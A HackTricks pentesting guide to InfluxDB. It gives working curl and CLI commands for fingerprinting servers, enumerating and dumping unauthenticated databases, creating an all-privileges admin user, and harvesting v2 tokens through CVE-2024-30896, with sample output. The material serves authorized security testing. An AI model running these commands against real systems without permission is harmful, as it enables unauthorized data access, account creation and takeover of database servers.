8086 - Pentesting InfluxDB

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

InfluxDB is an open-source time series database (TSDB) developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in storage space and performance for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance.

Default port: 8086

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Identify & Version (HTTP)

  • v1.x: GET /ping returns status 204 and headers like X-Influxdb-Version and X-Influxdb-Build.
  • v2.x+: GET /health returns JSON with the server version and status. Works without auth.
# v1 banner grab
curl -i http://<host>:8086/ping

# v2/compat health
curl -s http://<host>:8086/health | jq .

Tip: exposed instances often also serve Prometheus-style metrics at /metrics.

Enumeration

From a pentester point of view this another database that could be storing sensitive information, so it’s interesting to know how to dump all the info.

Authentication

InfluxDB might require authentication or not

# Try unauthenticated CLI (v1 shell)
influx -host <host> -port 8086
> use _internal

If you get an error like this one: ERR: unable to parse authentication credentials it means that it’s expecting some credentials.

influx –username influx –password influx_pass

There was a vulnerability influxdb that allowed to bypass the authentication: CVE-2019-20933

Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "epoch=ns" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'

Warning

In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: select * from "cpu"

If authentication is disabled, you can even create users and escalate:

# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"

The information of the following CLI example was taken from here.

Show databases

The found databases are telegraf and internal (you will find this one everywhere)

> show databases
name: databases
name
----
telegraf
_internal

Show tables/measurements

The InfluxDB documentation explains that measurements in InfluxDB can be paralleled with SQL tables. The nomenclature of these measurements is indicative of their respective content, each housing data relevant to a particular entity.

> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system

Show columns/field keys

The field keys are like the columns of the database

> show field keys
name: cpu
fieldKey         fieldType
--------         ---------
usage_guest      float
usage_guest_nice float
usage_idle       float
usage_iowait     float

name: disk
fieldKey     fieldType
--------     ---------
free         integer
inodes_free  integer
inodes_total integer
inodes_used  integer

[ ... more keys ...]

Dump Table

And finally you can dump the table doing something like

select * from cpu
name: cpu
time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101

InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

# Basic org, bucket, and auth discovery
TOKEN="<token>"; H="-H Authorization: Token $TOKEN"

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s $H http://<host>:8086/api/v2/organizations | jq .

# List buckets
curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux
curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
  -X POST http://<host>:8086/api/v2/query \
  --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'

Notes

  • For v1.8+, some v2-compatible endpoints exist (/api/v2/query, /api/v2/write, /health). This is useful if the server is v1 but accepts v2-style requests.
  • In v2, the HTTP Authorization header must be in the form Token <value>.

Automated Enumeration

msf6 > use auxiliary/scanner/http/influxdb_enum

Recent vulns and privesc of interest (last years)

  • InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via influx auth ls or GET /api/v2/authorizations). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:
# Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
  'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
# Look for entries of type "operator" and extract the raw token (if present)
  • Many legacy 1.x deployments still expose /query and /write unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks